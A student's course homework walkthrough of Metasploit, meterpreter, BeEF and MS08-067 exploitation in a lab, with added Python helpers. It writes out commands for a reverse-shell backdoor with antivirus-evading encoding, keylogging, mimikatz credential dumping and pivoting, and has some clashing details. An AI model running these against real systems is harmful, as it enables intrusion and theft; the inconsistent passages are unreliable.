2017-2018-2 20179205 "Network Attack and Defense Technology and Practice" Week 7 Homework

"Network Attack and Defense Technology and Practice" Week 7 Learning Summary

Video learning summary

1. Retrieval and Exploitation of Vulnerabilities

Exploit Toolset

1. Exploit Database -> searchsploit: offline keyword search of the Exploit-DB archive.

2. pattern_create: generates a long non-repeating string to send as the overflowing input; after the crash, the value that landed in EIP is looked up with pattern_offset to find the exact offset of the return address.

Testing the vulnerability:

armitage: graphical front end for Metasploit, used together with MSF for exploitation.

3. jboss-autopwn-linux / jboss-autopwn-win: exploit tool specifically for JBoss application servers.

4. tie: automation is turned on and the tool waits for the target to visit.

5. termineter: evaluates the security of smart meters.
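As an added example (not part of the original page, and not Metasploit's own pattern_create.rb / pattern_offset.rb), the following Python reproduces the cyclic pattern those tools generate, in the same Aa0Aa1...Zz9 order, so the offsets it reports agree with Metasploit's. The crash value 0x41316141 in the usage is a constructed stand-in for what a debugger would show in EIP.

```python
"""Cyclic pattern generation and offset lookup (the pattern_create /
pattern_offset workflow used to find the return-address offset in a stack
overflow). Added example; it is neither the page's code nor Metasploit's own
implementation, but it uses the same "Aa0Aa1Aa2...Zz9" ordering, so the
offsets it reports agree with pattern_offset.rb."""

import itertools
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
# 26 * 26 * 10 triples of 3 characters: the longest pattern without repeats.
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280


def pattern_create(length: int) -> str:
    """Return the first `length` characters of the cyclic pattern."""
    if not 0 < length <= MAX_LEN:
        raise ValueError(f"length must be between 1 and {MAX_LEN}")
    triples = ("".join(t) for t in itertools.product(UPPER, LOWER, DIGITS))
    needed = (length + 2) // 3          # enough triples to cover `length`
    return "".join(itertools.islice(triples, needed))[:length]


def pattern_offset(value, length: int = MAX_LEN) -> int:
    """Return the offset of `value` within the pattern, or -1 if absent.

    `value` may be the 4 ASCII characters themselves (str or bytes) or the
    integer the debugger shows in EIP, e.g. 0x41316141. The integer is
    unpacked as a little-endian 32-bit word, matching x86 stack layout.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    elif isinstance(value, bytes):
        needle = value.decode("latin-1")
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Send pattern_create(500) as the overflowing input; suppose the program
    # then crashes with EIP = 0x41316141 (a constructed value for this demo).
    print(pattern_create(500)[:40], "...")
    print("EIP offset:", pattern_offset(0x41316141))   # 3: bytes 3..6 hit EIP
```

The integer form matters in practice: x86 stores the dword little-endian, so EIP = 0x41316141 corresponds to the bytes "Aa1A" in the buffer, which start at offset 3.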

2. Metasploit basics of exploit

Metasploit is often used in penetration testing. In fact, this software includes many tools, which constitute a complete attack framework. They may not be the best tools for every aspect of penetration testing, but the combined framework makes it powerful.

1. Start the service

Metasploit is an important component of the Kali exploitation toolset. Two services must be started first, the PostgreSQL database and the metasploit service; only then can the MSF database be used to search exploits and record results.

service postgresql start 
service metasploit start

Starting the service produced an error. Searching online showed that this version of Kali no longer provides a metasploit service.

MSF with database support must instead be started as follows:

/etc/init.d/postgresql start  (or: service postgresql start)   // start the PostgreSQL database
msfdb init                                                      // initialise the MSF database
msfconsole
db_status                                                       // inside msf, shows the database connection status

If you don't want to start the services manually after every boot, enable them at system startup:

update-rc.d postgresql enable
update-rc.d metasploit enable

(On a version without a metasploit service, only the postgresql line applies.)

2. Path introduction

MSF path: cd /usr/share/metasploit-framework/
msfencode -l: command not found (the tool has been removed from newer versions of Kali; see msfvenom below)

auxiliary: auxiliary modules (scanners, fuzzers and servers).

encoders: the encoder modules used by msfencode; list them with msfencode -l.

exploits: the attack modules. Every article introducing msf mentions ms08_067_netapi, which lives in this directory.

payloads: the attack payloads, i.e. the code that runs after the exploit succeeds. The frequently used windows/meterpreter/reverse_tcp is in this folder.

post: post-exploitation modules, attack code that can be used after a meterpreter shell has been obtained. The commonly used hashdump and arp_scanner are here.

3. Basic commands

msfpayload: generates a payload or shellcode.
To find a payload, list them and filter, e.g. msfpayload -l | grep "windows".
Giving the payload name followed by O (e.g. msfpayload windows/meterpreter/reverse_tcp O) lists the parameters the payload requires.
msfencode: the encoder in msf. It was originally used to encode payloads to bypass AV; now it is commonly used on msfpayload output to avoid bad characters in an exploit.
msfconsole: opens Metasploit's console.

4. Test example: find vulnerabilities, search for exploits

Test the Metasploit tool with an SSH username enumeration attack. The target machine is winxpserver at 192.168.92.148; first use nmap to detect the open ports and service versions on the target:

The scan shows port 21 open, with vsftpd reported as version 5.0. In the msf console opened by msfconsole, search vsftpd to check whether a corresponding exploit exists:

5. Test example: select exploit to view parameters.

Select the module marked in the figure above (SSH username enumeration), load it with the use command, then view its parameters with show options:

6. Test example: select payload

Options whose Required column shows yes must be set. Set the remote host address:

7. Test Example: Setting Parameters

Use the set command to set each parameter; the output confirms that the parameter has been set.

8. Test Example: Execute Attack Test

Enter exploit to run the attack. On success a shell is returned and the UID is printed in green, which indicates the attack succeeded. From here you can check the target's IP address and cat files to read information.

3. Meterpreter for vulnerability exploitation

  Meterpreter is an extension module of the Metasploit framework, used as the payload after a successful overflow. Once the exploit succeeds, the payload gives us a control channel back; using it as the payload yields a Meterpreter shell connected to the target system.

  As a post-exploitation module, Meterpreter has many variants. Its commands consist of core commands and extension-library commands, which greatly enriches the attack options: adding a user, hiding things, opening a shell, obtaining user passwords, uploading and downloading files to and from the remote host, running cmd.exe, capturing the screen, taking remote control, capturing keystrokes, clearing event logs, displaying the remote host's system information, displaying the remote machine's network interfaces and IP addresses, and so on.

Common commands:

background   put the current session in the background
load / use   load an extension module
interact     switch to a channel
migrate      migrate to another process
run          execute an existing module (script)
resource     execute an existing rc script

Common meterpreter payload type:

payload windows/meterpreter/reverse_tcp

1. Generate the meterpreter backdoor:

Command used: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

Nothing appeared after running it, because msfpayload has been removed from newer versions of Kali. From now on just use msfvenom, which combines the functions of msfpayload and msfencode:

So the equivalent command to generate the meterpreter backdoor is:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/door.exe

(-e selects the encoder, -i the number of encoding passes, -f the output format and -o the output file; the original command's msfencode -c 5 corresponds to -i 5.)

Generated successfully, move it into the XP system:

2. Open MSF and enable monitoring

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333

Modify the listening port:

3. Execute door.exe on the target host

Execute exploit in kali's msf to start listening:

4. View executable commands through the help command:

5. Common command usage

6. Capture the screen, you can see that the capture results are saved under root

7. Keyboard monitoring

Start capture: keyscan_start
Dump captured keystrokes: keyscan_dump
Stop capture: keyscan_stop

8. Extension tool: load

9. Load mimikatz of extension tools

Grab local passwords in plaintext:

The help output now includes the mimikatz commands:

To get credentials, enter the command: wdigest

4. Metasploit post-penetration testing

  Once a foothold has been obtained on the pivot (springboard) host, the next step is to extend access to the intranet hosts behind it: gather information about the specified targets and probe their systems for vulnerabilities. With the system's vulnerabilities and the meterpreter backdoor already obtained through MSF, this series of operations becomes much easier.

1. Check the network card of the springboard

ifconfig

2. Add routing table

run autoroute -s 10.0.0.0 -n 255.255.255.0

Here -s is the intranet subnet reachable from the pivot and -n its netmask. This is the most commonly used pivoting method in Metasploit: after binding the route to the session, msf modules can scan or attack across network segments through it.

3. Open a socks proxy

Using the auxiliary/server/socks4a module, create a socks proxy that browsers, sqlmap, nmap (via proxychains) and similar tools can use:

background                      put the session in the background
search socks                    find the socks proxy modules
use auxiliary/server/socks4a
show options
exploit                         starts the proxy (listens on SRVPORT, 1080 by default)

4. Switch between sessions freely with background and sessions -i <id>.

5. Typing run (and tab-completing) shows the many scripts meterpreter can run.

6. The post-exploitation modules can be listed with run post/ (tab-complete).

7. Scan intranet information

run arp_scanner -r <target IP range>

Intranet port forwarding:

upload lcx.exe c:\      upload lcx.exe to the root of the C: drive

8. You can also upload files and do port forwarding for subsequent testing
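What the socks4a module from step 3 speaks on the wire, as an added example (not the page's or Metasploit's own code): the Python below encodes the SOCKS4/SOCKS4a CONNECT request a client such as proxychains sends to the proxy and decodes the proxy's reply. The hosts and ports in the usage are constructed; the point it shows is why the 4a form is needed when the intranet name can only be resolved on the pivot side.

```python
"""SOCKS4 / SOCKS4a CONNECT request and reply encoding, the protocol a
client such as proxychains, nmap or sqlmap speaks to the auxiliary/server/
socks4a listener on the pivot. Added example, neither the page's nor
Metasploit's code. Hosts and ports used in the demo are constructed."""

import ipaddress
import struct

SOCKS_VERSION = 0x04
CMD_CONNECT = 0x01
REPLY_GRANTED = 0x5A
REPLY_CODES = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "rejected: could not reach client identd",
    0x5D: "rejected: identd user mismatch",
}


def build_socks4a_connect(host: str, port: int, userid: bytes = b"") -> bytes:
    """Encode a CONNECT to host:port.

    IPv4 literal -> plain SOCKS4:  VN CD DSTPORT DSTIP USERID NUL
    hostname     -> SOCKS4a:       same, but DSTIP = 0.0.0.1 (an invalid
                    address with a non-zero last octet) and the name follows,
                    NUL terminated, so the proxy on the pivot resolves it with
                    the intranet's DNS instead of the attacker's machine.
    """
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    try:
        dst_ip = ipaddress.IPv4Address(host).packed
        trailer = b""
    except ipaddress.AddressValueError:
        dst_ip = b"\x00\x00\x00\x01"
        trailer = host.encode("idna") + b"\x00"
    header = struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port)
    return header + dst_ip + userid + b"\x00" + trailer


def parse_socks4_reply(data: bytes) -> dict:
    """Decode the fixed 8-byte reply: VN(0) CD DSTPORT DSTIP."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != 0:
        raise ValueError(f"unexpected reply version {vn}")
    return {
        "granted": cd == REPLY_GRANTED,
        "status": REPLY_CODES.get(cd, f"unknown code 0x{cd:02x}"),
        "port": port,
        "ip": str(ipaddress.IPv4Address(data[4:8])),
    }


if __name__ == "__main__":
    # Constructed demo: ask the pivot's proxy to reach an intranet SMB port.
    req = build_socks4a_connect("intranet.local", 445)
    print("request:", req.hex())
    print("reply  :", parse_socks4_reply(b"\x00\x5a\x01\xbd\x0a\x00\x00\x05"))
```

When a tool is pointed at the proxy with a plain SOCKS4 configuration it resolves names locally, which fails for intranet-only names; the 4a request defers resolution to the pivot, which is what makes scanning by hostname through the session work.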

5. BeEF for vulnerability exploitation

Exploiting XSS vulnerabilities needs strong framework support. BeEF (Browser Exploitation Framework) is a penetration-testing tool focused on the browser side.

1. Start BeeF from the command line

Just run the beef-xss command; it opens the browser, which jumps to the BeEF login page automatically:

Default username: beef
Password: beef

You can enter the main interface:

2. Hook the host under test

Test: on the host under test, open the URL http://127.0.0.1:3000/demos/basic.html, a demo page that includes the hook script:

The hooked host then appears as an online browser on the left of the main interface:

3. The hook lasts until the test page is closed. During that time the browser is effectively under control and attack commands can be sent to it; the Commands tab offers many tasks.

The colours of the command modules indicate:

green: the module works against this target and is not noticeable to the user.

orange: the module works against this target but may be noticed by the user.

grey: whether the module works against this target has not yet been verified.

red: the module does not work against this target.

4. Select the Raw JavaScript module under Misc as a test case

A table gives a detailed description of the module and its optional parameters. Enter some test JavaScript (here a "good morning" message) and click Execute to run it:

After execution the result can be seen on the target page:

5.Proxy function

Select the target host, right-click, choose Use as Proxy from the menu, then under the Rider tab use Forge Request to edit and send the request you want the hooked browser to make:

After it is sent, it appears under the History option; once the transmission succeeds, click the entry to show the detailed request and response:

6. Loading Metasploit into BeEF

BeEF does not load Metasploit by default. To use Metasploit's rich attack modules, some configuration is needed: modify config.yaml, then open msfconsole and load the msgrpc plugin; afterwards many more modules appear under the Metasploit category.

In /usr/share/beef-xss/config.yaml, set the metasploit extension's enable line to true:

Make sure that the IP and other information here are set correctly, and modify the custom path:

After configuration, open msfconsole and run the command:

load msgrpc ServerHost=192.168.92.150 Pass=abc123

Change to the directory with cd /usr/share/beef-xss/
and run ./beef -x (which resets BeEF's database)

Restart beef and find that many Metasploit attack modules have been loaded:

Textbook Chapter 7: Windows Operating System Security Attack and Defense, learning summary

1. Basic framework of Windows operating system

1. The basic structure of Windows divides into the operating system kernel, which runs in the processor's privileged mode (kernel mode), and the user-level components, which run in the processor's unprivileged mode (user mode).

2. Core mechanisms: process and thread management, memory management, file management, registry management, network management.

3. Network management mechanism, bottom up: network card hardware driver (physical layer); NDIS library and miniport drivers (link layer); TDI transport layer, i.e. the network protocol drivers (network and transport layers); network API DLLs and TDI clients (session and presentation layers); network applications and service processes (application layer).

2. Security Architecture and Mechanism of Windows Operating System

1. Reference monitor model: every access by a subject to an object is mediated by the reference monitor, which authorises access according to the security access-control policy and generates audit logs of all accesses.

2. Core components: the SRM (Security Reference Monitor, in the kernel), the LSASS security service (user mode), winlogon/netlogon, and Eventlog.

3. Authentication mechanism: security principals are users, user groups and computers; local authentication involves the winlogon process, the GINA graphical login window and the LSASS service; network authentication uses NTLM, LanMan or Kerberos.

4. Authorisation and access control: objects are files, directories, registry keys, kernel objects, synchronisation objects, private objects, pipes, memory and communication interfaces. Each object's security descriptor consists of the Owner SID, Group SID, DACL (discretionary access control list) and SACL (system audit access control list).

5. Security audit mechanism.

6. Other security mechanisms: Security Center (firewall, automatic patch updates, virus protection), IPsec loading and verification, the EFS encrypting file system, Windows File Protection, and the privacy and security protections of the bundled IE browser.

3. Windows remote security attack and defense technology

1. Categories: remote password guessing attacks, attacks on Windows network services, and attacks on Windows clients and users.

2. Remote password guessing targets the SMB protocol (tcp/445, tcp/139) and also the WMI service, the TS remote desktop terminal service, the MS SQL database service, and SharePoint.

3. Preventing remote password guessing: disable unnecessary vulnerable network services, configure the host firewall to restrict access to the relevant ports, restrict access to these services at the network firewall, disable the outdated and flawed LanMan and NTLM authentication, and enforce a strong password policy.

4. Remote penetration attacks on network services: well-known vulnerabilities and attacks on the NetBIOS service, the SMB service and the MSRPC service; remote penetration attacks on Microsoft network services on Windows; and remote penetration attacks on third-party services on Windows.

5. Preventive measures against remote penetration of network services: the most basic one is to avoid and eliminate the security vulnerabilities in the service software that these attacks rely on.

4. Windows local security attack and defense technology

1. Local privilege escalation attacks exploit security flaws and vulnerabilities in the operating system kernel and in programs started by privileged users, because servers and desktops are not always patched promptly.

2. Sensitive information theft: Windows password hash extraction (copying the password hash file, backing it up with the rdisk tool, extracting hashes from the SAM file or Active Directory with pwdumpx); Windows password cracking; theft of users' sensitive data with find, findstr, grep and meterpreter.

3. Preventing local sensitive information theft: choose strong, hard-to-guess passwords, use more secure password hashing algorithms, and configure security policies properly.

5. Windows attack experiment

Experiment description:

Use Metasploit to attack MS08-067, and submit screenshots (no fewer than five) of the process of obtaining the remote shell.

MS08-067 Vulnerability Introduction

  MS08-067, the Windows Server Service RPC Request Buffer Overflow Vulnerability, allows remote code execution when an affected system receives a specially crafted RPC request. On Windows 2000, Windows XP and Windows Server 2003, an attacker can exploit it to run arbitrary code without authentication. The vulnerability is wormable, and worms that exploit it already exist.

experimental tool

The attacker machine used in this experiment is Kali and the target machine is Win2kServer:

Attacker: 192.168.92.147
Target: 192.168.92.148

Experimental steps:

1. First make sure the attacker and target can ping each other, then open msfconsole in the Kali terminal.

2. Search for ms08_067 to check whether an exploit module exists; the matching module is shown in the returned information.

3. Enter use exploit/windows/smb/ms08_067_netapi to enter the exploit module. Some commands then display further information, for example:

show payloads lists the payloads that can be used, such as shell_reverse_tcp

set payload generic/shell_reverse_tcp selects the payload

show targets lists the target operating system versions that can be attacked

4. Enter show options to display the parameters that must be set before attacking.

5. Set the attacker and target addresses, then use show options again to check the payload settings:

set LHOST <attacker IP>, i.e. set LHOST 192.168.92.147
set RHOST <target IP>, i.e. set RHOST 192.168.92.148

6. Enter exploit to launch the attack; the figure below shows the result of a successful attack.

7. Run ipconfig /all in the returned shell and compare it with the target machine's own output: they match, confirming that the shell is running on the target.

8. Enter netstat -a to see which ports the target machine has open.

9. Enter netstat -n to view the target's active network connections, including the connection back to the attacker.
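A check a practitioner wants at step 9, as an added example that is not part of the original homework: the Python below parses netstat -n output from the target and picks out the session the reverse shell opened back to the attacker. The netstat text is constructed for this demo, and it assumes the handler used the reverse_tcp payload's default LPORT of 4444, since the experiment set only LHOST and RHOST.

```python
"""Find the reverse-shell connection in Windows `netstat -n` output.
Added example, not the page's own code. SAMPLE_NETSTAT is constructed for
the demo: target 192.168.92.148, attacker 192.168.92.147, and the handler
listening on the reverse_tcp default port 4444 (an assumption; the page
set only LHOST/RHOST)."""

import re

ATTACKER_IP = "192.168.92.147"
HANDLER_PORT = 4444     # assumed default LPORT of generic/shell_reverse_tcp

# Constructed sample of `netstat -n` as seen on the target (Windows layout).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.168.92.148:139     192.168.92.147:1034    ESTABLISHED
  TCP    192.168.92.148:445     192.168.92.147:1035    ESTABLISHED
  TCP    192.168.92.148:1040    192.168.92.147:4444    ESTABLISHED
  TCP    192.168.92.148:1041    192.168.92.1:80        TIME_WAIT
  UDP    192.168.92.148:137     *:*
"""

# Proto, local ip:port, foreign ip:port, optional state (UDP rows have none).
NETSTAT_ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+(\S+))?\s*$")


def _port(text):
    return None if text == "*" else int(text)


def parse_netstat(text):
    """Turn netstat output into a list of dicts, skipping header lines."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if not m:
            continue
        proto, lip, lport, fip, fport, state = m.groups()
        rows.append({"proto": proto, "local_ip": lip, "local_port": _port(lport),
                     "foreign_ip": fip, "foreign_port": _port(fport),
                     "state": state})
    return rows


def connections_with(rows, peer_ip):
    """All rows whose foreign endpoint is peer_ip (exploit and shell traffic)."""
    return [r for r in rows if r["foreign_ip"] == peer_ip]


def reverse_shell_candidates(rows, peer_ip, handler_port=HANDLER_PORT):
    """ESTABLISHED TCP sessions from an ephemeral local port to peer:handler.

    The exploit itself arrives inbound on 445/139 (the well-known port is on
    the local side); the reverse shell is the outbound session the target
    opened to the attacker's handler, so the well-known port is on the
    foreign side and the local port is ephemeral.
    """
    return [r for r in rows
            if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"
            and r["foreign_ip"] == peer_ip
            and r["foreign_port"] == handler_port
            and r["local_port"] is not None and r["local_port"] >= 1024]


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for r in reverse_shell_candidates(rows, ATTACKER_IP):
        print(f"reverse shell: {r['local_ip']}:{r['local_port']} -> "
              f"{r['foreign_ip']}:{r['foreign_port']}")
```

The same distinction is what a defender looks for in the target's connection table: the SMB sessions on 139/445 are the exploit delivery, while an outbound ESTABLISHED connection from a high port to the attacker's listener is the shell itself.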
